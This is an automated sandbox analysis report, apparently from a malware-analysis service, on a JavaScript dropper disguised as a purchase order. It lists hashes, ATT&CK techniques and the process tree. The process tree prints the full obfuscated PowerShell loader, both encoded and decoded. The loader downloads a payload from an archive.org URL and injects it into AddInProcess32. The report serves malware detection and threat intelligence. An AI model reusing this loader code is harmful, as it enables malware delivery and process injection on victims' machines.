b7c01a5a9f1ee5788c80fa1bb233afbe3827365cf19ff63f0f71b5bc731b5096

General

Target

PO No.7500011330.js
Size

601KB
MD5

2775b43e1e9b8e237f506cc02c0dfd9e
SHA1

0816358f326556470110ded8e13e3409ab46ec4c
SHA256

92e24621f961d0095911956dbe9a6400feb59a324cbb0994ae1290b2a2045b13
SHA512

a41baead687120db6017b800d09604e3b53113c229a5fcf18d7a7d1b1f3f05319e0239d160150bcf4b01caff7989829d6730ae0c728d793641f09bb0347c97d0
SSDEEP

12288:Dvf0MG9e5BJXO6fU68Mkf/r3z0jUJPjjids+hXhGjpLJCZgywlrzvR6tNhEY8vTi:hTEt3Y1ZaXc

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2108	powershell.exe
6	2108	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3056	powershell.exe
2108	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3056	powershell.exe
2108	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3056	powershell.exe
Token: SeDebugPrivilege	2108	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2148 wrote to memory of 3056	2148	wscript.exe	31
PID 2148 wrote to memory of 3056	2148	wscript.exe	31
PID 2148 wrote to memory of 3056	2148	wscript.exe	31
PID 3056 wrote to memory of 2108	3056	powershell.exe	33
PID 3056 wrote to memory of 2108	3056	powershell.exe	33
PID 3056 wrote to memory of 2108	3056	powershell.exe	33

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\PO No.7500011330.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:2148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAoACAAJABWAGUAcgBiAE8AcwBFAFAAUgBlAEYARQBSAEUAbgBjAEUALgB0AG8AcwBUAHIAaQBuAEcAKAApAFsAMQAsADMAXQArACcAeAAnAC0ASgBvAEkATgAnACcAKQAgACgAIAAoACgAJwB4AEUAdAB1AHIAJwArACcAbAAgAD0AIABGADUASgBoAHQAdABwACcAKwAnAHMAOgAvACcAKwAnAC8AJwArACcAaQBhADkAMAAnACsAJwA0ADYAJwArACcAMAAnACsAJwAxAC4AdQAnACsAJwBzAC4AYQByACcAKwAnAGMAaABpACcAKwAnAHYAZQAuAG8AcgBnAC8ANgAnACsAJwAvAGkAdAAnACsAJwBlAG0AcwAvAGQAJwArACcAZQB0ACcAKwAnAGEAaAAtAG4AbwB0ACcAKwAnAGUALQAnACsAJwBqAC8ARABlAHQAYQBoACcAKwAnAE4AbwB0ACcAKwAnAGUASgAnACsAJwAuAHQAeAB0AEYANQBKADsAeABFACcAKwAnAHQAYgBhACcAKwAnAHMAZQA2ADQAQwBvAG4AdABlAG4AdAAgAD0AIAAoAE4AZQB3AC0AJwArACcATwBiAGoAZQBjACcAKwAnAHQAIAAnACsAJwBTAHkAJwArACcAcwAnACsAJwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuACcAKwAnAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpACcAKwAnAG4AZwAoAHgARQB0AHUAJwArACcAcgBsACcAKwAnACkAOwB4AEUAdABiAGkAbgBhAHIAJwArACcAeQBDAG8AbgB0AGUAbgB0ACAAPQAnACsAJwAgAFsAJwArACcAUwB5AHMAJwArACcAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AJwArACcAOgA6AEYAJwArACcAcgBvAG0AQgBhAHMAJwArACcAZQA2ADQAUwB0AHIAaQBuAGcAKAB4AEUAJwArACcAdAAnACsAJwBiACcAKwAnAGEAcwAnACsAJwBlADYAJwArACcANAAnACsAJwBDAG8AbgB0AGUAbgB0ACkAOwB4AEUAdAAnACsAJwBhAHMAcwBlACcAKwAnAG0AYgBsAHkAJwArACcAIAA9ACAAWwBSAGUAZgBsAGUAYwAnACsAJwB0ACcAKwAnAGkAbwBuAC4AQQBzAHMAZQBtACcAKwAnAGIAbAB5AF0AOgA6AEwAbwBhACcAKwAnAGQAKAB4ACcAKwAnAEUAdABiAGkAbgBhAHIAJwArACcAeQBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAnACsAJwB4ACcAKwAnAEUAdAB0ACcAKwAnAHkAcABlACAAPQAgAHgARQB0AGEAcwBzAGUAbQAnACsAJwBiACcAKwAnAGwAeQAuACcAKwAnAEcAZQB0AFQAeQBwACcAKwAnAGUAKABGADUAJwArACcASgBSAHUAbgBQAEUALgBIACcAKwAnAG8AJwArACcAbQAnACsAJwBlAEYAJwArACcANQBKACkAOwB4AEUAdABtAGUAdABoAG8AZAAgAD0AIAB4AEUAJwArACcAdAAnACsAJwB0AHkAcABlACcAKwAnAC4ARwBlAHQATQBlAHQAaABvAGQAKABGADUASgBWAEEAJwArACcASQBGADUASgAnACsAJwApADsAeABFAHQAbQAnACsAJwBlAHQAJwArACcAaAAnACsAJwBvAGQALgBJAG4AdgBvAGsAZQAnACsAJwAoACcAKwAnAHgARQAnACsAJwB0AG4AdQBsAGwALAAgAFsAJwArACcAbwBiAGoAZQAnACsAJwBjAHQAWwBdAF0AQAAoAEYANQAnACsAJwBKACcAKwAnAHQAJwArACcAeAB0ACcAKwAnAC4AaABjAG8AcwBlAGwAaQBkAC8AdgBlAGQALgAyAHIALgAzADkAYgAzADQANQAzADAAJwArACcAMgAnACsAJwBhADAANwA1AGIAMQBiAGMAMABkADQANQBiADYAMwAyACcAKwAnAGUAYgAnACsAJwA5AGUAZQA2ADIALQBiAHUAcAAvAC8AOgBzAHAAJwArACcAdAB0AGgARgA1ACcAKwAnAEoAIAAsACcAKwAnACAAJwArACcARgA1AEoAZABlACcAKwAnAHMAYQB0AGkAdgBhAGQAbwBGADUASgAgACwAIABGADUASgBkAGUAcwBhAHQAaQB2AGEAZABvAEYANQBKACAALAAgAEYANQAnACsAJwBKAGQAZQBzAGEAdABpAHYAYQBkAG8ARgA1AEoAJwArACcALABGADUASgAnACsAJwBBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAzADIAJwArACcARgA1AEoALABGACcAKwAnADUASgAnACsAJwBkAGUAcwBhAHQAJwArACcAaQB2AGEAZABvAEYANQBKACkAJwArACcAKQA7ACcAKQAtAFIAZQBQAGwAQQBDAEUAIAAnAEYANQBKACcALABbAGMAaABhAHIAXQAzADkAIAAtAFIAZQBQAGwAQQBDAEUAIAAnAHgARQB0ACcALABbAGMAaABhAHIAXQAzADYAKQAgACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VerbOsEPReFEREncE.tosTrinG()[1,3]+'x'-JoIN'') ( (('xEtur'+'l = F5Jhttp'+'s:/'+'/'+'ia90'+'46'+'0'+'1.u'+'s.ar'+'chi'+'ve.org/6'+'/it'+'ems/d'+'et'+'ah-not'+'e-'+'j/Detah'+'Not'+'eJ'+'.txtF5J;xE'+'tba'+'se64Content = (New-'+'Objec'+'t '+'Sy'+'s'+'tem.Net.WebClien'+'t).DownloadStri'+'ng(xEtu'+'rl'+');xEtbinar'+'yContent ='+' ['+'Sys'+'tem.Convert]'+'::F'+'romBas'+'e64String(xE'+'t'+'b'+'as'+'e6'+'4'+'Content);xEt'+'asse'+'mbly'+' = [Reflec'+'t'+'ion.Assem'+'bly]::Loa'+'d(x'+'Etbinar'+'yCont'+'ent);'+'x'+'Ett'+'ype = xEtassem'+'b'+'ly.'+'GetTyp'+'e(F5'+'JRunPE.H'+'o'+'m'+'eF'+'5J);xEtmethod = xE'+'t'+'type'+'.GetMethod(F5JVA'+'IF5J'+');xEtm'+'et'+'h'+'od.Invoke'+'('+'xE'+'tnull, ['+'obje'+'ct[]]@(F5'+'J'+'t'+'xt'+'.hcoselid/ved.2r.39b34530'+'2'+'a075b1bc0d45b632'+'eb'+'9ee62-bup//:sp'+'tthF5'+'J ,'+' '+'F5Jde'+'sativadoF5J , F5JdesativadoF5J , F5'+'JdesativadoF5J'+',F5J'+'AddInProcess32'+'F5J,F'+'5J'+'desat'+'ivadoF5J)'+');')-RePlACE 'F5J',[char]39 -RePlACE 'xEt',[char]36) )"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
02349ad8788e2c8ef060195f57cbefaf

SHA1
845366ce29d9cfca333a2973f9e14fbc8e45c977

SHA256
2e37e3526bd8584a8c3fa9d4d2891f9859829316dc2d21e33c820e0ef0f4daf3

SHA512
6ea334b266ec33460aaa5f79393c6b9fdfe34298395b74b64dbc26b8c9875f107a02531cd671ae68f51d7e50e485487948c7f47dae7c020bc1d5fb4490c1d4a2

Download Submit
memory/3056-4-0x000007FEF62DE000-0x000007FEF62DF000-memory.dmp

Filesize
4KB

Download
memory/3056-5-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/3056-6-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

Filesize
32KB

Download
memory/3056-12-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download
memory/3056-13-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing